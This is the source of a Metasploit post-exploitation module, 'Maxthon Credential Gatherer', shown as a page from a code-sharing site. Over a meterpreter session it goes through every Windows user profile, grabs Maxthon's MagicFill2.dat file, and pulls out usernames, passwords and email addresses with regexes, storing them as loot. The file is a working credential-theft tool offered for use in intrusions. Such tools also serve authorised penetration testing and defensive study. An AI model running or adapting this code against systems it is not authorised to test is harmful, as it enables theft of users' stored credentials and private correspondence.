Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/windows/gather/credentials/maxthon.rb
21550 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7


8
  include Msf::Post::File

9
  include Msf::Post::Windows::UserProfiles

10
  include Msf::Post::Windows::Packrat

11


12
  ARTIFACTS =

13
    {

14
      application: 'maxthon',

15
      app_category: 'browsers',

16
      gatherable_artifacts: [

17
        {

18
          filetypes: 'logins',

19
          path: 'AppData',

20
          dir: 'Maxthon3',

21
          artifact_file_name: 'MagicFill2.dat',

22
          description: "Maxthon's sent and received emails",

23
          credential_type: 'text',

24
          regex_search: [

25
            {

26
              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',

27
              extraction_type: 'credentials',

28
              regex: [

29
                '(?i-mx:password.*)',

30
                '(?i-mx:username.*)'

31
              ]

32
            },

33
            {

34
              extraction_description: 'searches for Email TO/FROM address',

35
              extraction_type: 'Email addresses',

36
              regex: [

37
                '(?i-mx:to:.*)',

38
                '(?i-mx:from:.*)'

39
              ]

40
            }

41
          ]

42
        }

43
      ]

44
    }.freeze

45


46
  def initialize(info = {})

47
    super(

48
      update_info(

49
        info,

50
        'Name' => 'Maxthon Credential Gatherer',

51
        'Description' => %q{

52
          This module searches for Maxthon credentials on a Windows host.

53
        },

54
        'License' => MSF_LICENSE,

55
        'Author' => [

56
          'Kazuyoshi Maruta',

57
          'Daniel Hallsworth',

58
          'Barwar Salim M',

59
          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org

60
        ],

61
        'Platform' => ['win'],

62
        'SessionTypes' => ['meterpreter'],

63
        'Notes' => {

64
          'Stability' => [CRASH_SAFE],

65
          'Reliability' => [],

66
          'SideEffects' => []

67
        }

68
      )

69
    )

70


71
    register_options(

72
      [

73
        OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),

74
        OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),

75
        OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),

76
        # enumerates the options based on the artifacts that are defined below

77
        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])

78
      ]

79
    )

80
  end

81


82
  def run

83
    print_status('Filtering based on these selections:  ')

84
    print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")

85
    print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")

86
    print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")

87


88
    # used to grab files for each user on the remote host

89
    grab_user_profiles.each do |userprofile|

90
      run_packrat(userprofile, ARTIFACTS)

91
    end

92


93
    print_status 'PackRat credential sweep completed'

94
  end

95
end

96


97